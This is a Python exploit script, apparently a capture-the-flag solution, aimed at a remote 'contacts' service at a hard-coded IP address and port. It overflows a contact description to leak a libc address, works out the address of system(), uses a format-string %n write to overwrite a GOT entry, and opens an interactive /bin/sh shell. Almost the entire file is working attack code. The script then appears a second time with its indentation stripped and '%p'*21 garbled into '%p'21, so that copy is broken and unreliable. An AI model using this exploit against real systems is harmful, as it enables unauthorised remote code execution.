peternguyen93/contacts.py

## contacts.py
#!/usr/bin/python

from Pwn import *

p = Pwn(host='54.165.223.128',port=2555)
# p = Pwn()

def create_contact(name,description):
	p.read_until('>>>')
	p.write('1\n')
	p.read_until('Name:')
	p.send(name + '\n')
	p.read_until('Enter Phone No:')
	p.write('123123123\n')
	p.read_until('Length of description:')
	p.write(str(len(description) + 1) + '\n')
	p.read_until('Enter description:\n\t\t')
	p.send(description + '\n')

def edit_concat(**kwargs):
	p.read_until('>>>')
	p.write('3\n') # edit contact
	p.send(kwargs['name'] + '\n')

	p.read_until('>>>')
	if kwargs['mode'] == 2:
		p.write('2\n')
		p.read_until('Length of description:')
		p.write(str(len(kwargs['description']) + 1) + '\n')
		p.read_until('Description:')
		p.send(kwargs['description'] + '\n')
	else:
		p.write('1\n')
		p.read_until('New name:')
		p.write(kwargs['new_name'])

def exploit():
	p.connect()
	# raw_input('>')
	create_contact('peter1','A'*79)
	create_contact('peter2','A'*79)

	leak = 'A'*72 + p.pack(0x0804b010) + p.pack(0x0804b010) + 'peter2'
	edit_concat(name='peter1',mode=2,description=leak)
	edit_concat(name='peter1',mode=1,new_name=leak)

	p.read_until('>>>')
	p.write('4\n')
	leak = p.read_until('Menu:')
	# print repr(leak)
	i = leak.index('Name: peter2\n\tLength 80\n\tPhone #:') + 34
	leak = p.unpack(leak[i:i + 4])

	offset = p.get_libc_offset(leak,'printf')
	system = leak - offset

	print '[+] printf():',hex(leak)
	print '[+] system():',hex(system)

	create_contact('peter3','A'*79)
	create_contact('peter4','A'*79)

	first = system & 0xffff
	second = (system >> 16) - first

	fmt = '%{0}x%1$n%{1}x%9$n'.format(str(first),str(second))
	# print fmt
	# raw_input('>>')

	payload = p.pack(0x0804b030)*(72/4)
	payload+= p.pack(0x804b198) + p.pack(0x0804b030) # fake contact
	payload+= fmt + '%p'*21 + p.pack(0x0804b032) + '%p'*40

	edit_concat(name='peter3',mode=2,description=payload)
	edit_concat(name='peter3',mode=1,new_name=payload)


	p.read_until('>>>') # trigger bug
	p.write('4\n')

	p.read_until('>>>')
	p.write('1\n')
	p.read_until('Name:')
	p.write('/bin/sh\n')

	p.io()

exploit()
	#!/usr/bin/python

	from Pwn import *

	p = Pwn(host='54.165.223.128',port=2555)
	# p = Pwn()

	def create_contact(name,description):
	p.read_until('>>>')
	p.write('1\n')
	p.read_until('Name:')
	p.send(name + '\n')
	p.read_until('Enter Phone No:')
	p.write('123123123\n')
	p.read_until('Length of description:')
	p.write(str(len(description) + 1) + '\n')
	p.read_until('Enter description:\n\t\t')
	p.send(description + '\n')

	def edit_concat(**kwargs):
	p.read_until('>>>')
	p.write('3\n') # edit contact
	p.send(kwargs['name'] + '\n')

	p.read_until('>>>')
	if kwargs['mode'] == 2:
	p.write('2\n')
	p.read_until('Length of description:')
	p.write(str(len(kwargs['description']) + 1) + '\n')
	p.read_until('Description:')
	p.send(kwargs['description'] + '\n')
	else:
	p.write('1\n')
	p.read_until('New name:')
	p.write(kwargs['new_name'])

	def exploit():
	p.connect()
	# raw_input('>')
	create_contact('peter1','A'*79)
	create_contact('peter2','A'*79)

	leak = 'A'*72 + p.pack(0x0804b010) + p.pack(0x0804b010) + 'peter2'
	edit_concat(name='peter1',mode=2,description=leak)
	edit_concat(name='peter1',mode=1,new_name=leak)

	p.read_until('>>>')
	p.write('4\n')
	leak = p.read_until('Menu:')
	# print repr(leak)
	i = leak.index('Name: peter2\n\tLength 80\n\tPhone #:') + 34
	leak = p.unpack(leak[i:i + 4])

	offset = p.get_libc_offset(leak,'printf')
	system = leak - offset

	print '[+] printf():',hex(leak)
	print '[+] system():',hex(system)

	create_contact('peter3','A'*79)
	create_contact('peter4','A'*79)

	first = system & 0xffff
	second = (system >> 16) - first

	fmt = '%{0}x%1$n%{1}x%9$n'.format(str(first),str(second))
	# print fmt
	# raw_input('>>')

	payload = p.pack(0x0804b030)*(72/4)
	payload+= p.pack(0x804b198) + p.pack(0x0804b030) # fake contact
	payload+= fmt + '%p'21 + p.pack(0x0804b032) + '%p'40

	edit_concat(name='peter3',mode=2,description=payload)
	edit_concat(name='peter3',mode=1,new_name=payload)


	p.read_until('>>>') # trigger bug
	p.write('4\n')

	p.read_until('>>>')
	p.write('1\n')
	p.read_until('Name:')
	p.write('/bin/sh\n')

	p.io()

	exploit()